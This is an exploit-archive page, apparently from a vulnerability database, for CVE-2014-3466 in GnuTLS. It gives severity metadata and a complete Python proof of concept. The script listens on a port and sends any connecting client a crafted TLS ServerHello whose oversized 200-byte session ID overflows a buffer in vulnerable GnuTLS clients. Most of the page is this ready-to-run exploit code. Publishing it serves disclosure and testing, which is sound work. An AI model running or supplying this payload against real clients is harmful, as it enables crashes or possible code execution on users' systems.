GNUTLS insufficient session id length check PoC

2014.06.06

Credit: Aaron Zauner

Risk: High

Local: No

Remote: Yes

CVE: CVE-2014-3466

CWE: CWE-119

CVSS Base Score: 6.8/10

Impact Subscore: 6.4/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

#!/usr/bin/env python
#
# PoC for CVE-2014-3466
# (gnutls: insufficient session id length check in _gnutls_read_server_hello)
#
# Author: Aaron Zauner <azet@azet.org>
# License: CC BY 3.0 (https://creativecommons.org/licenses/by/3.0)
#
import sys
import socket
import time
# Record Layer
R_Type = '16' # Handshake Protocol
R_Version = '03 01' # TLS 1.0
R_Length = '00 fa' # 250 Bytes
# Handshake Protocol: ServerHello
HS_Type = '02' # Handshake Type: ServerHello
HS_Length = '00 00 f6' # 246 Bytes
HS_Version = '03 01' # TLS 1.0
HS_Random = '''
53 8b 7f 63 c1 0e 1d 72 0a b3 f8 a7 0f f5 5d 69
65 58 42 80 c1 fb 4f db 9a aa 04 a3 d3 4b 71 c7
''' # Random (gmt_unix_time + random bytes)
HS_SessID_Len = 'c8' # Session ID Length 200 Bytes (!)
HS_SessID_Data = '''
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
''' # Session ID Data (Payload)
MaliciousServerHello = (
R_Type + R_Version + R_Length +
HS_Type + HS_Length + HS_Version +
HS_Random + HS_SessID_Len + HS_SessID_Data
).replace(' ', '').replace('\n', '').decode('hex')
def main():
try:
PORT = int(sys.argv[1])
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind(('', PORT))
sock.listen(1)
print "-- started listener on port", PORT
while True:
conn, addr = sock.accept()
print "<< client connected:", addr
time.sleep(0.5) # wait for ClientHello :P
if conn.send(MaliciousServerHello):
print ">> sent payload to", addr[0]
conn.close()
finally:
sock.close()
if __name__ == '__main__':
if len(sys.argv) <= 1:
print " Usage:\n\tpython poc.py [port]\n"
exit(1)
main()

References:

http://www.gnutls.org/security.html

http://www.tripwire.com/state-of-security/top-security-stories/gnutls-crypto-library-vulnerability-cve-2014-3466/

https://security.stackexchange.com/questions/59407/gnutls-serverhello-exploit-cve-2014-3466-how-to-verify

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

GNUTLS insufficient session id length check PoC

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.